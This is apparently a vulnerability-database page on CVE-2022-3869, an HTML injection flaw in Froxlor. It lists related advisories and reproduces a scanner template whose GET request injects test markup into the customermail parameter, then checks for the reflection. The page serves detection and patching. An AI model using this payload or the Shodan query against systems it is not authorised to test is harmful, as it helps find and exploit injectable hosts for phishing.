| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| Html Injection Reflected in Login Page | 4 Nov 202210:30 | โ | huntr | |
| CVE-2022-3869 | 6 Nov 202206:07 | โ | circl | |
| Froxlor ่ทจ็ซ่ๆฌๆผๆด | 5 Nov 202200:00 | โ | cnnvd | |
| CVE-2022-3869 | 5 Nov 202200:00 | โ | cve | |
| CVE-2022-3869 Code Injection in froxlor/froxlor | 5 Nov 202200:00 | โ | cvelist | |
| Froxlor vulnerable to code injection | 5 Nov 202219:00 | โ | github | |
| CVE-2022-3869 | 5 Nov 202214:15 | โ | nvd | |
| CVE-2022-3869 Code Injection in froxlor/froxlor | 5 Nov 202200:00 | โ | osv | |
| GHSA-6RJV-XXGR-V57X Froxlor vulnerable to code injection | 5 Nov 202219:00 | โ | osv | |
| Code injection | 5 Nov 202214:15 | โ | prion |
id: CVE-2022-3869
info:
name: Froxlor < 0.10.38.2. - HTML Injection
author: ctflearner
severity: medium
description: |
HTML Injection in GitHub repository froxlor/froxlor prior to 0.10.38.2.
impact: |
Attackers can inject arbitrary HTML content through the customermail parameter, potentially displaying fake content to users and facilitating phishing attacks against Froxlor administrators.
remediation: |
Update Froxlor to version 0.10.38.2 or later that properly sanitizes the customermail parameter and encodes HTML output.
reference:
- https://huntr.com/bounties/7de20f21-4a9b-445d-ae2b-15ade648900b
- https://nvd.nist.gov/vuln/detail/CVE-2022-3869
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-3869
cwe-id: CWE-79
epss-score: 0.01265
epss-percentile: 0.66169
metadata:
verified: true
max-request: 1
shodan-query: title:"Froxlor"
product: froxlor
tags: cve2022,cve,froxlor,html,vuln
http:
- method: GET
path:
- "{{BaseURL}}/index.php?showmessage=4&customermail=\"><h2>TEST</h2>"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'The message to ""><h2>TEST</h2>" failed'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4a0a00473045022100b5d8df02c76601b97dff4e29eb8f1c2d17a011d2a3e2417d95cd4b1161c9c6a102202c640a318dde7c22483fadaab524b33cf2e86d2709ccb2d62d1b5cb4f2696e04:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation